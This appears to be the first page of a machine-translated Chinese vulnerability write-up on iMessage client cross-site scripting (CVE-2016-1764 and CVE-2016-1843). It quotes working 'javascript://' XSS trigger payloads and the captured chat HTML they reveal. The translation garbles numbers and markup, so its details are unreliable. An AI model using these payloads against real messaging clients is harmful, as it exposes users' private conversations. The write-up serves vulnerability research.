From Old exploits to new vulnerabilities – iMessage 0day(CVE-2 0 1 6-1 8 4 3) Tap record-vulnerability warning-the black bar safety net

2016-10-29T00:00:00
ID MYHACK58:62201680684
Type myhack58
Reporter 佚名
Modified 2016-10-29T00:00:00

Description

0x01 introduction Note: in the article“0day”in the report to the official after the assigned vulnerability ID: CVE-2 0 1 6-1 8 4 3 A few days ago a foreigner posted a 3 month update to fix iMessage xssVulnerability, CVE-2 0 1 6-1 7 6 4)details: https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/ https://github.com/BishopFox/cve-2016-1764 They publish these details in fact is not given in detail the trigger point of the analysis, I analysis that is based on the information found a new 0day in. 0x02 CVE-2 0 1 6-1 7 6 4 vulnerability analysis CVE-2 0 1 6-1 7 6 4 in the most simple trigger Payload: javascript://a/research?% 0d%0aprompt(1) As can be seen this is obviously the javascript Protocol in a tips%0d%0a no processing after the result of the xss, this tips in looking for xss leaks are relatively common. This it is worth mentioning why you want to use prompt(1) and we commonly used is the alert(1), I actually tested found alert does't pop up, in addition to in a lot of sites actually put the alert directly to the harmony of the filter, so here to remind everyone that in the testing xss, the prompt to replace the alert is necessary to Encountered such a client xss if you want to analyze, the first step should look at the location. href information. This is mainly to see which domain, this vulnerability is in applewebdata:// Protocol, this original vulnerability analysis there given. And then to look at specific trigger points, typically in the browser, we can look through the html source code to analyze, but in the client under the General can not see, so here is a little trick: javascript://a/research?% 0d%0aprompt(1,document. head. innerHTML) Here is a look at the html in the head code: @media screen and (-webkit-device-pixel-ratio:2) {}link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI. framework/Resources/balloons-modern. css"> Continue to see the lower body of the code: javascript://a/research?% 0d%0aprompt(1,document. body. innerHTML)

chatitem id="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="1" item-type="header">header guid="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">headermessage text-direction="ltr">“xxx@xxx.com”for iMessage communication/headermessage>/header>/chatitem>chatitem id="d:E4BCBB48-9 2 8 6-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp"> timestamp guid="d:E4BCBB48-9 2 8 6-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9 2 8 6-49EC-BA1D-xxxxxxxxxxxx">date date="481908183.907740">today 2 3:2 3/date>/timestamp>/chatitem> chatitem id="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"> message guid="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes">buddyicon role="img" aria-label="black brother">div>/div>/buddyicon> messagetext>messagebody title="today 2 3:2 3:0 3" aria-label="javascript://a/research?% 0d%0aprompt(1,document. body. innerHTML)">messagetextcontainer text-direction="ltr">span style="">a href=" " title="javascript://a/research? prompt(1,document. body. innerHTML)">javascript://a/research?% 0d%0aprompt(1,document. body. innerHTML) prompt(1,document. body. innerHTML)">javascript://a/research?% 0d%0aprompt(1,document. body. innerHTML)compact">p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"> p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes">img" aria-label="black brother">today 2 3:2 4:5 1" aria-label="javascript://a/research?% 0d%0aprompt(1,document. head. innerHTML)">

[1] [2] [3] next